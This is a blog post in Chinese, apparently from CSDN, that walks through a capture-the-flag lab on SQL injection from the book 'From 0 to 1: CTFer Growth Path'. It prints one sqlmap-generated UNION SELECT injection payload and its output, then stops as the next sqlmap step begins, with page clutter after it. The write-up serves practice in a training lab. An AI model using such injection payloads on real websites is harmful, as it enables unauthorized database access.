《从0到1:CTFer成长之路》书籍配套题目-[第一章 web入门]SQL注入-1

本文介绍了《从0到1:CTFer成长之路》书籍配套题目中的第一章web入门部分,涉及SQL注入。通过sqlmap工具逐步揭示数据库信息,包括数据库名、表名、列名,最终成功获取到flag。强调了理解sqlmap工具及其工作原理的重要性,并提供了相关教程链接。
摘要由CSDN通过智能技术生成

《从0到1:CTFer成长之路》书籍配套题目,来源网站:《从0到1:CTFer成长之路》
[第一章 web入门]SQL注入-1
1.首页
在这里插入图片描述
使用sqlmap破解
sqlmap扫描结果。

在这里插入图片描述有结果可知Payload:
id=-8462' UNION ALL SELECT NULL,NULL,CONCAT(0x7162627a71,0x57696b44676d524a54594c47686e45526e48524c746a49566d6f5941487355764262516c7569765a,0x717a787071)-- -
用上得到结果。

在这里插入图片描述qbbzqWikDgmRJTYLGhnERnHRLtjIVmoYAHsUvBbQluivZqzxpq
但这还不是flag,那就继续呗。
但这几个payload都不是,所以这条路走不通。
所以一步一步来。

1.sqlmap爆当前数据库信息

python sqlmap
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值